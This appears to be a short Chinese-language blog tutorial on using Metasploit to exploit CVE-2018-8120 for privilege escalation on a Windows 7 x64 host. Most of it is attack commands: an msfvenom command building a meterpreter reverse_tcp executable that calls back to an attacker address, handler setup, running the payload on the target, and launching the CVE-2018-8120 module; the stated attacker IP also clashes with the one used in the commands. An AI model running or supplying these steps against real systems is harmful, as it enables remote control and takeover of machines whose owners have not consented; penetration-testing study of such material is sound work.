您好,登錄后才能下訂單哦!
這篇文章將為大家詳細(xì)講解有關(guān)Metasploit中如何利用cve-2018-8120提升權(quán)限,文章內(nèi)容質(zhì)量較高,因此小編分享給大家做個(gè)參考,希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。
一、生成木馬
目標(biāo)主機(jī):192.168.1.129(win7 x64)
攻擊機(jī):192.168.1.33
攻擊端口:12121
生成木馬:msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe
二、進(jìn)入監(jiān)聽(tīng)模塊 use exploit/multi/handler
三、設(shè)置payload反彈 set windows/x64/meterpreter/reverse_tcp
四、查看需要設(shè)置的參數(shù):show options
五、設(shè)置攻擊機(jī)ip:set lhost 192.168.1.133
六、設(shè)置攻擊端口:set lport 12121
七、將生成的exe文件上傳到目標(biāo)主機(jī)并運(yùn)行
八、run攻擊
九、getuid 查看權(quán)限
十、background 后臺(tái)運(yùn)行
十一、搜索我們要利用的模塊 search cve-2018-8120,并選擇進(jìn)入
十二、run,運(yùn)行,并重新查看權(quán)限
關(guān)于Metasploit中如何利用cve-2018-8120提升權(quán)限就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò),可以把它分享出去讓更多的人看到。
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。